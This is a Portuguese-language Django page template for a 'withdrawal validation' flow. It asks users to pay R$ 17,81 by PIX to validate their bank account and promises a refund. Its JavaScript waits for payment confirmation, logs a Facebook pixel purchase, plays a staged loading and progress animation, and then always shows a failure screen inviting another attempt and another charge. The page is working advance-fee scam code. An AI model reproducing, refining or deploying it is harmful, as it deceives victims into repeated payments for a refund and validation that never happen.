{% load static %}
{% load tracking_tags %}
<!DOCTYPE html>
<html lang="pt-br">

<head>
    <meta charset="UTF-8">
    <meta name="viewport"
        content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, viewport-fit=cover">
    <meta name="facebook-domain-verification" content="73hwg7lythnnqtl0mtlqdgyewx6h3z" />
    <!-- font -->
    <link rel="stylesheet" href="{% static 'fonts/fonts.css' %}">
    <!-- Icons -->
    <link rel="stylesheet" href="{% static 'fonts/font-icons.css' %}">
    <link rel="stylesheet" href="{% static 'css/bootstrap.min.css' %}">
    <link rel="stylesheet" type="text/css" href="{% static 'css/styles.css' %}" />
    <!-- Favicon and Touch Icons -->
    <link rel="shortcut icon" href="{% static 'images/logo/48.png' %}" />
    <link rel="apple-touch-icon-precomposed" href="{% static 'images/logo/48.png' %}" />

    {% tracking_head %}

    <title>Validação de Saque</title>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/qrcodejs/1.0.0/qrcode.min.js"></script>

    <style>
        .icon {
            font-size: 3em;
            color: #4caf50;
            margin-bottom: 20px;
        }

        .qr-code-img {
            display: block;
            margin: 20px auto;
            width: 200px;
            height: 200px;
        }

        #pix-amount,
        #timer {
            font-size: 1.2em;
            font-weight: bold;
            display: block;
            text-align: center;
            margin: 10px 0;
            color: white;
        }

        .pix-code {
            width: 100%;
            padding: 12px;
            margin: 20px 0;
            border: 1px solid #444;
            border-radius: 6px;
            background-color: #333;
            color: #fff;
            text-align: center;
        }

        .styled-button.small {
            font-size: 1.1em;
            padding: 12px 24px;
            margin: 10px 0;
        }

        p {
            text-align: center;
            margin: 10px 0;
        }

        .loading-overlay {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.8);
            z-index: 1050;
            justify-content: center;
            align-items: center;
            flex-direction: column;
            color: white;
            animation: fadeIn 0.5s ease-in-out;
        }

        .loading-overlay.active {
            display: flex;
        }

        @keyframes fadeIn {
            from {
                opacity: 0;
            }

            to {
                opacity: 1;
            }
        }

        .spinner {
            border: 8px solid rgba(255, 255, 255, 0.3);
            border-top: 8px solid #4caf50;
            border-radius: 50%;
            width: 60px;
            height: 60px;
            animation: spin 1s linear infinite;
            margin-bottom: 20px;
        }

        @keyframes spin {
            0% {
                transform: rotate(0deg);
            }

            100% {
                transform: rotate(360deg);
            }
        }

        #loading-message {
            font-size: 18px;
            font-weight: bold;
        }

        /* Estilos aprimorados para modals, inspirados em Nubank: clean, minimalista, com transições suaves, cores vibrantes (verde para loading/progress, vermelho para falha), sombras suaves, animações de fade e scale */
        .modal-overlay {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.6);
            /* Fundo semi-transparente para foco */
            z-index: 1060;
            justify-content: center;
            align-items: center;
            animation: fadeIn 0.3s ease-out;
        }

        .modal-content {
            background: #222223;
            /* Alterado para fundo escuro */
            color: white;
            /* Alterado para texto branco */
            border-radius: 16px;
            /* Bordas arredondadas suaves, estilo Nubank */
            padding: 32px;
            text-align: center;
            max-width: 320px;
            width: 90%;
            box-shadow: 0 8px 24px rgba(0, 0, 0, 0.2);
            /* Sombra suave para profundidade */
            animation: scaleIn 0.3s ease-out;
            /* Animação de entrada como em confirmações modernas */
        }

        .modal-title {
            color: white !important;
            /* Garantir branco */
        }

        .modal-description {
            color: white !important;
            /* Garantir branco */
        }

        @keyframes scaleIn {
            from {
                transform: scale(0.95);
                opacity: 0;
            }

            to {
                transform: scale(1);
                opacity: 1;
            }
        }

        .modal-icon {
            font-size: 3.5em;
            margin-bottom: 16px;
        }

        .modal-title {
            font-size: 1.5em;
            font-weight: bold;
            margin-bottom: 16px;
        }

        .modal-description {
            font-size: 1em;
            color: #666;
            margin-bottom: 24px;
        }

        /* Spinner aprimorado: maior, com cor verde inspirada em sucesso bancário (mas adaptado) */
        .modal-spinner {
            border: 6px solid rgba(76, 175, 80, 0.2);
            /* Verde claro */
            border-top: 6px solid #4caf50;
            /* Verde principal */
            border-radius: 50%;
            width: 50px;
            height: 50px;
            animation: spin 1.2s cubic-bezier(0.5, 0, 0.5, 1) infinite;
            /* Easing suave como em Nubank */
            margin: 0 auto 16px;
        }

        /* Progress bar aprimorada: thicker, com gradiente, animação easing */
        .progress-bar-container {
            width: 100%;
            height: 8px;
            background: #e0e0e0;
            /* Cinza claro */
            border-radius: 4px;
            overflow: hidden;
            margin-bottom: 16px;
        }

        .progress {
            height: 100%;
            background: linear-gradient(90deg, #4caf50, #66bb6a);
            /* Gradiente verde para dinamismo */
            width: 0;
            transition: none;
            /* Removido transition para animação frame-by-frame funcionar sem interferência */
        }

        /* Falha: Ícone vermelho, shake animation para impacto */
        .failure-icon {
            color: #f44336;
            /* Vermelho Nubank-like para erros */
            animation: shake 0.5s ease-in-out;
        }

        @keyframes shake {

            0%,
            100% {
                transform: translateX(0);
            }

            20% {
                transform: translateX(-5px);
            }

            40% {
                transform: translateX(5px);
            }

            60% {
                transform: translateX(-5px);
            }

            80% {
                transform: translateX(5px);
            }
        }

        .retry-button {
            background: #4caf50;
            color: white;
            border: none;
            border-radius: 8px;
            padding: 12px 24px;
            font-size: 1em;
            cursor: pointer;
            transition: background 0.2s ease;
        }

        .retry-button:hover {
            background: #43a047;
            /* Hover suave */
        }

        .hidden {
            display: none !important;
        }
    </style>
</head>

<body>
    <!-- preloade -->
    <div class="preload preload-container">
        <div class="preload-logo" style="background-image: url('{% static 'images/logo/144.png' %}')">
            <div class="spinner"></div>
        </div>
    </div>
    <!-- /preload -->
    <div class="header fixed-top bg-surface d-flex justify-content-center align-items-center">
        <a href="{% url 'core:withdraw_balance' %}" class="left back-btn"><i class="icon-left-btn"></i></a>
        <!-- <h3>Validação de Saque</h3> -->
    </div>
    <div class="wrap-boarding pt-45 pb-90">
        <div class="tf-container">
            <div class="d-flex flex-column min-vh-100 justify-content-between">
                {% if validation_status == "pix_created" %}
                <!-- Show PIX step if already created -->
                <div id="pix-step" style="display: block;">
                    <div class="banner-boarding2 mt-20">
                        <div class="icon"><i class="icon-qrcode"></i></div>
                    </div>
                    <div class="content mb-32">
                        <h2 class="text-center">Realize o Pagamento via PIX</h2>
                        <p class="mt-8 text-center text-large">Escaneie o QR Code ou copie a chave PIX para concluir a
                            validação.</p>
                        <div id="pix-content">
                        <div id="qrcode" class="qr-code-img"></div>
                        <span id="pix-amount">R$ 17,81</span>
                        <input type="text" readonly value="{{ pix_transaction.qr_code|default:'' }}" id="pixcode" class="pix-code" />
                        <button onclick="copyToClipboard(this)" class="styled-button small">Copiar chave PIX</button>
                        <p>Tempo restante para validação: <span id="timer">09:59</span></p>
                        </div>
                    </div>
                </div>
                {% elif validation_status == "payment_reported" %}
                <!-- Show waiting message -->
                <div class="banner-boarding mt-30">
                    <div class="icon"><i class="icon-hourglass-half"></i></div>
                </div>
                <div class="content mb-32">
                    <h2 class="text-center">Verificando pagamento...</h2>
                    <p class="mt-8 text-center text-large">Aguardando confirmação da validação via Pix. Isso pode levar
                        até 25 minutos.</p>
                    {% if pix_transaction.paid_at %}
                    <p><strong>Pagamento confirmado em:</strong> {{ pix_transaction.paid_at|date:"d/m/Y H:i" }}</p>
                    <p>Seu pagamento foi registrado e está sendo processado.</p>
                    {% else %}
                    <div class="spinner"></div>
                    {% endif %}
                    <form method="post" action="{% url 'core:reset_validation' %}">
                        {% csrf_token %}
                        <button type="submit" class="tf-btn primary md mt-40">Reiniciar Verificação</button>
                    </form>
                </div>
                {% else %}
                <!-- Full Step 1 -->
                <div id="full-step1" style="display: block;">
                    <div class="banner-boarding mt-30">
                        <div class="icon"><i class="icon-user-check"></i></div>
                    </div>
                    <div class="content mb-32">
                        <h2 class="text-center">Você precisa validar sua conta</h2>
                        <p class="mt-8 text-center text-large">Para continuar com seu saque, você precisa validar sua
                            conta bancária.</p>
                        <p class="mt-8 text-center text-large">Notamos que esse será o seu primeiro saque. Para validar
                            sua conta bancária e adicionar uma nova chave PIX de forma segura, precisamos confirmar sua
                            conta bancária.</p>
                        <button onclick="nextStep(2)" class="tf-btn primary md mt-40">Próximo</button>
                    </div>
                </div>

                <!-- Full Step 2 -->
                <div id="full-step2" style="display: none;">
                    <div class="banner-boarding2 mt-20">
                        <div class="icon"><i class="icon-dollar-sign"></i></div>
                    </div>
                    <div class="content mb-32">
                        <h2 class="text-center">Detalhes do Pagamento</h2>
                        <p class="mt-8 text-center text-large">Faça um pagamento via PIX de R$ 17,81 para validar sua
                            conta bancária. Este valor será reembolsado imediatamente após a confirmação.</p>
                        <p class="mt-8 text-center text-large">Salientamos que esse valor será reembolsado após a
                            confirmação do recebimento do valor na conta destinatária.</p>
                        <button onclick="nextStep(3)" class="tf-btn primary md mt-40">Próximo</button>
                    </div>
                </div>

                <!-- Full Step 3 -->
                <div id="full-step3" style="display: none;">
                    <div class="banner-boarding mt-30">
                        <div class="icon"><i class="icon-rocket"></i></div>
                    </div>
                    <div class="content mb-32">
                        <h2 class="text-center">Processo Rápido e Seguro</h2>
                        <p class="mt-8 text-center text-large">Este processo valida sua conta bancária e garante saques
                            seguros. Pronto para começar?</p>
                        <button onclick="initiatePixGeneration()" class="tf-btn primary md mt-40">Iniciar
                            Validação</button>
                    </div>
                </div>
                <!-- PIX Step -->
                <div id="pix-step" style="display: none;">
                    <div class="banner-boarding2 mt-20">
                        <div class="icon"><i class="icon-qrcode"></i></div>
                    </div>
                    <div class="content mb-32">
                        <h2 class="text-center">Realize o Pagamento via PIX</h2>
                        <p class="mt-8 text-center text-large">Escaneie o QR Code ou copie a chave PIX para concluir a
                            validação.</p>
                        <div id="pix-content"></div>
                    </div>
                </div>
                {% endif %}
            </div>
        </div>
    </div>

    <!-- Loading Overlay (já existente, reutilizado para 'Gerando PIX') -->
    <div class="loading-overlay" id="loading-overlay">
        <div class="spinner"></div>
        <p id="loading-message">Gerando PIX...</p>
    </div>

    <!-- Novo Modal para Carregando (spinner, reutiliza classes para consistência) -->
    <div class="modal-overlay" id="loading-modal">
        <div class="modal-content">
            <div class="modal-spinner"></div>
            <div class="modal-title">Carregando...</div>
            <div class="modal-description">Aguardando confirmação do pagamento.</div>
        </div>
    </div>

    <!-- Novo Modal para Validando (progress bar) -->
    <div class="modal-overlay" id="validating-modal">
        <div class="modal-content">
            <i class="modal-icon icon icon-cog" style="color: #4caf50;"></i>
            <!-- Ícone de engrenagem rodando, ajuste se tiver font-icon -->
            <div class="modal-title">Validando conta...</div>
            <div class="modal-description">Isso pode levar alguns segundos.</div>
            <div class="progress-bar-container">
                <div class="progress" id="progress-fill"></div>
            </div>
        </div>
    </div>

    <!-- Novo conteúdo para Falha (substituído pela animação com bolinhas vermelhas, não mais um modal) -->
    <div id="failure-page" style="display: none;">
        <div class="bg-camera">
            <div class="tf-container">
                <div class="pt-30 pb-30">
                    <div class="success_box">
                        <!-- bolinhas animadas vermelhas -->
                        <div class="icon-1 ani3">
                            <span class="circle-box lg bg-circle error-icon bg-danger"></span>
                        </div>
                        <div class="icon-2 ani5">
                            <span class="circle-box md bg-danger"></span>
                        </div>
                        <div class="icon-3 ani8">
                            <span class="circle-box md bg-danger"></span>
                        </div>
                        <div class="icon-4 ani2">
                            <span class="circle-box sm bg-danger"></span>
                        </div>

                        <!-- título e texto -->
                        <h2 class="text-surface text-center text-danger">A validação falhou</h2>
                        <p class="text-large text-center mt-8">Nós identificamos sua tentativa de validação, mas
                            infelizmente não foi possível confirmar a titularidade da sua conta.</p>
                        <p class="text-large text-center">Você pode realizar uma nova tentativa clicando no botão
                            abaixo.</p>

                        <!-- botão -->
                        <button class="tf-btn lg danger mt-40" onclick="retryValidation()">Tentar novamente</button>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <script type="text/javascript" src="{% static 'js/bootstrap.min.js' %}"></script>
    <script type="text/javascript" src="{% static 'js/jquery.min.js' %}"></script>
    <script type="text/javascript" src="{% static 'js/main.js' %}"></script>

<script>
    function nextStep(step) {
        ['full-step1', 'full-step2', 'full-step3', 'pix-step'].forEach(id => {
            const el = document.getElementById(id);
            if (el) el.style.display = 'none';
            else console.warn(`Element ${id} not found in DOM`);
        });
        const targetStep = document.getElementById(`full-step${step}`);
        if (targetStep) {
            targetStep.style.display = 'block';
            console.log(`Switched to full-step${step}`);
        } else {
            console.error(`Step full-step${step} not found in DOM`);
            alert('Erro: Etapa não encontrada. Recarregue a página.');
        }
    }

    function canGeneratePix() {
        let count = parseInt(localStorage.getItem('pixGenerationCount') || '0');
        let lastTime = parseInt(localStorage.getItem('lastPixGenerationTime') || '0');
        let now = Date.now();
        return count < 3 && (now - lastTime > 300000);  // 5 minutos = 300000 ms
    }

    function showGenerateButton() {
        let count = parseInt(localStorage.getItem('pixGenerationCount') || '0');
        if (count < 3) {
            const pixContent = document.getElementById('pix-content');
            if (pixContent && !pixContent.querySelector('button[onclick="generateNewPix()"]')) {
                const button = document.createElement('button');
                button.className = 'styled-button small';
                button.onclick = generateNewPix;
                button.innerText = 'Gerar novo PIX';
                pixContent.insertBefore(button, pixContent.querySelector('#timer').parentNode);
            }
        }
    }

    function initiatePixGeneration() {
        const loadingOverlay = document.getElementById('loading-overlay');
        const pixStep = document.getElementById('pix-step');
        const pixContent = document.getElementById('pix-content');
        if (!pixStep || !pixContent) {
            console.error('pix-step or pix-content not found in DOM');
            alert('Erro: Elementos da interface não encontrados. Recarregue a página.');
            return;
        }

        loadingOverlay.classList.add('active');
        fetch("{% url 'core:withdraw_validation' %}", {
            method: 'POST',
            headers: {
                'X-CSRFToken': '{{ csrf_token }}',
                'X-Requested-With': 'XMLHttpRequest'
            }
        })
            .then(response => {
                console.log('Initiate PIX Response Status:', response.status);
                console.log('Initiate PIX Response Headers:', response.headers);
                return response.text();
            })
            .then(text => {
                console.log('Initiate PIX Response Text:', text);
                let data;
                try {
                    data = JSON.parse(text);
                } catch (e) {
                    console.error('Initiate PIX JSON Parse Error:', e);
                    throw new Error('Resposta inválida do servidor');
                }
                console.log('Initiate PIX Response Data:', data);
                loadingOverlay.classList.remove('active');
                if (data.status === 'success') {
                    fbq('track', 'InitiateCheckout');
                    ['full-step1', 'full-step2', 'full-step3'].forEach(id => {
                        const el = document.getElementById(id);
                        if (el) el.style.display = 'none';
                    });
                    pixStep.style.display = 'block';
                    let count = parseInt(localStorage.getItem('pixGenerationCount') || '0');
                    localStorage.setItem('pixGenerationCount', count + 1);
                    localStorage.setItem('lastPixGenerationTime', Date.now());
                    pixContent.innerHTML = `
                    <div id="qrcode" class="qr-code-img"></div>
                    <span id="pix-amount">R$ ${data.amount.toFixed(2).replace('.', ',')}</span>
                    <input type="text" readonly value="${data.qr_code}" id="pixcode" class="pix-code" />
                    <button onclick="copyToClipboard(this)" class="styled-button small">Copiar chave PIX</button>
                    <p>Tempo restante para validação: <span id="timer">09:59</span></p>
                    `;
                    renderQR('qrcode', data.qr_code);

                    pixContent.classList.remove('hidden');
                    console.log('PIX content updated successfully');
                    startPolling();  // Inicia polling após gerar PIX
                    // Start timer to show button after 5 min if allowed
                    setTimeout(showGenerateButton, 300000);
                } else {
                    console.log('Initiate PIX Error:', data.message || 'Unknown error');
                    alert(data.message || 'Erro ao gerar PIX. Tente novamente.');
                }
            })
            .catch(error => {
                console.error('Initiate PIX Error:', error);
                loadingOverlay.classList.remove('active');
                alert('Erro ao processar a requisição: ' + error.message);
            });
    }

    function copyToClipboard(button) {
        const pixCode = document.getElementById('pixcode');
        if (!pixCode) {
            console.error('pixcode input not found in DOM');
            alert('Erro: Campo de chave PIX não encontrado.');
            return;
        }
        pixCode.select();
        document.execCommand('copy');
        button.innerText = 'Chave copiada!';
        setTimeout(() => {
            button.innerText = 'Copiar chave PIX';
        }, 3000);
    }

    function generateNewPix() {
        if (!canGeneratePix()) {
            alert('Você pode gerar um novo PIX apenas a cada 5 minutos e no máximo 3 vezes.');
            return;
        }

        const loadingOverlay = document.getElementById('loading-overlay');
        const pixStep = document.getElementById('pix-step');
        const pixContent = document.getElementById('pix-content');
        const container = document.querySelector('.d-flex.flex-column.min-vh-100');
        if (!pixStep || !pixContent || !container) {
            console.error('pix-step, pix-content, or container not found in DOM');
            alert('Erro: Elementos da interface não encontrados. Recarregue a página.');
            return;
        }

        // Ensure pix-step is visible
        ['full-step1', 'full-step2', 'full-step3'].forEach(id => {
            const el = document.getElementById(id);
            if (el) el.style.display = 'none';
        });
        pixStep.style.display = 'block';

        loadingOverlay.classList.add('active');
        fetch("{% url 'core:withdraw_validation' %}", {
            method: 'POST',
            headers: {
                'X-CSRFToken': '{{ csrf_token }}',
                'X-Requested-With': 'XMLHttpRequest'
            }
        })
            .then(response => {
                console.log('Generate PIX Response Status:', response.status);
                console.log('Generate PIX Response Headers:', response.headers);
                return response.text();
            })
            .then(text => {
                console.log('Generate PIX Response Text:', text);
                let data;
                try {
                    data = JSON.parse(text);
                } catch (e) {
                    console.error('Generate PIX JSON Parse Error:', e);
                    throw new Error('Resposta inválida do servidor');
                }
                console.log('Generate PIX Response Data:', data);
                loadingOverlay.classList.remove('active');
                if (data.status === 'success') {
                    fbq('track', 'InitiateCheckout');
                    let count = parseInt(localStorage.getItem('pixGenerationCount') || '0');
                    localStorage.setItem('pixGenerationCount', count + 1);
                    localStorage.setItem('lastPixGenerationTime', Date.now());
                    pixContent.innerHTML = `
                    <img src="data:image/png;base64,${data.qr_code_image}" alt="QR Code Pix" class="qr-code-img" />
                    <span id="pix-amount">R$ ${data.amount.toFixed(2).replace('.', ',')}</span>
                    <input type="text" readonly value="${data.qr_code}" id="pixcode" class="pix-code" />
                    <button onclick="copyToClipboard(this)" class="styled-button small">Copiar chave PIX</button>
                    <p>Tempo restante para validação: <span id="timer">09:59</span></p>
                `;
                    pixContent.classList.remove('hidden');
                    console.log('PIX content updated successfully');
                    startPolling();  // Inicia polling após gerar novo PIX
                    // Start timer to show button after 5 min if allowed
                    setTimeout(showGenerateButton, 300000);
                } else {
                    console.log('Generate PIX Error:', data.message || 'Unknown error');
                    alert(data.message || 'Erro ao gerar novo PIX. Tente novamente.');
                }
            })
            .catch(error => {
                console.error('Generate PIX Error:', error);
                loadingOverlay.classList.remove('active');
                alert('Erro ao processar a requisição: ' + error.message);
            });
    }

    function retryValidation() {
        const wrapBoarding = document.querySelector('.wrap-boarding');
        fetch("{% url 'core:reset_validation' %}", {
            method: 'POST',
            headers: {
                'X-CSRFToken': '{{ csrf_token }}',
                'X-Requested-With': 'XMLHttpRequest'
            }
        })
            .then(response => {
                if (response.ok) {
                    return response.json();
                } else {
                    throw new Error('Error resetting validation');
                }
            })
            .then(data => {
                if (data.status === 'success') {
                    localStorage.removeItem('pixGenerationCount');
                    localStorage.removeItem('lastPixGenerationTime');
                    document.getElementById('failure-page').style.display = 'none';
                    if (wrapBoarding) wrapBoarding.style.display = 'block';
                    initiatePixGeneration();
                }
            })
            .catch(error => {
                console.error('Error resetting:', error);
                alert('Erro ao reiniciar a validação.');
            });
    }

    // Função para polling do status do PIX
    function startPolling() {
        const interval = setInterval(() => {
            fetch('/check-pix-status/', {  // Ajuste para '/core/check_pix_status/' se usar namespace
                method: 'GET',
                headers: { 'X-Requested-With': 'XMLHttpRequest' }
            })
            .then(response => response.json())
            .then(data => {
                if (data.status === 'AUTHORIZED' || data.status === 'CONFIRMED' || data.status === 'RECEIVED') {
                    fbq('track', 'Purchase', {value: 17.81, currency: 'BRL'});
                    clearInterval(interval);  // Para polling
                    // Esconder conteúdo do PIX
                    document.getElementById('pix-content').classList.add('hidden');
                    // Apagar a div wrap-boarding ao iniciar a animação de validação
                    const wrapBoarding = document.querySelector('.wrap-boarding');
                    if (wrapBoarding) {
                        wrapBoarding.style.display = 'none';
                    }
                    // Mostrar modal de loading por 3s
                    const loadingModal = document.getElementById('loading-modal');
                    loadingModal.style.display = 'flex';
                    setTimeout(() => {
                        loadingModal.style.display = 'none';
                        // Mostrar modal de validating por 15s
                        const validatingModal = document.getElementById('validating-modal');
                        validatingModal.style.display = 'flex';
                        const progressFill = document.getElementById('progress-fill');
                        animateProgressBar(progressFill, 15000);  // Anima em 15s
                        setTimeout(() => {
                            validatingModal.style.display = 'none';
                            // Mostrar página de falha
                            document.getElementById('failure-page').style.display = 'block';
                        }, 15000);
                    }, 3000);
                }
            })
            .catch(error => console.error('Erro no polling:', error));
        }, 2000);  // Checa a cada 2s
    }

    // Função para animar a progress bar (0 a 100% em duration ms com easing)
    function animateProgressBar(progressElement, duration) {
        let progress = 0;
        const start = performance.now();
        function step(timestamp) {
            const elapsed = timestamp - start;
            progress = Math.min((elapsed / duration) * 100, 100);
            progressElement.style.width = `${progress}%`;
            if (elapsed < duration) {
                requestAnimationFrame(step);
            }
        }
        requestAnimationFrame(step);
    }

    let countdown = 600;
    setInterval(() => {
        if (countdown > 0) countdown--;
        const minutes = String(Math.floor(countdown / 60)).padStart(2, '0');
        const seconds = String(countdown % 60).padStart(2, '0');
        const timerEl = document.getElementById('timer');
        if (timerEl) timerEl.innerText = `${minutes}:${seconds}`;
        else console.warn('Timer element not found in DOM');
    }, 1000);

    // On page load, for existing PIX, check if can generate and show button if yes
    document.addEventListener('DOMContentLoaded', () => {
        showGenerateButton();
    });
</script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/qrcodejs/1.0.0/qrcode.min.js" defer></script>
<script>
  function renderQR(targetId, payload) {
    const el = document.getElementById(targetId);
    if (!el || !payload) return;

    // limpa qualquer conteúdo anterior
    el.innerHTML = '';

    // qrcodejs instancia direto no container:
    // corrige conflitos: QRCode (classe) vem da lib qrcodejs
    new QRCode(el, {
      text: payload,
      width: 220,
      height: 220,
      correctLevel: QRCode.CorrectLevel.M
    });
  }

  document.addEventListener('DOMContentLoaded', function () {
    const existingPix = "{{ pix_transaction.qr_code|default:'' }}";
    if (existingPix) renderQR('qrcode', existingPix);
  });
</script>
    {% tracking_body_end %}
</body>

</html>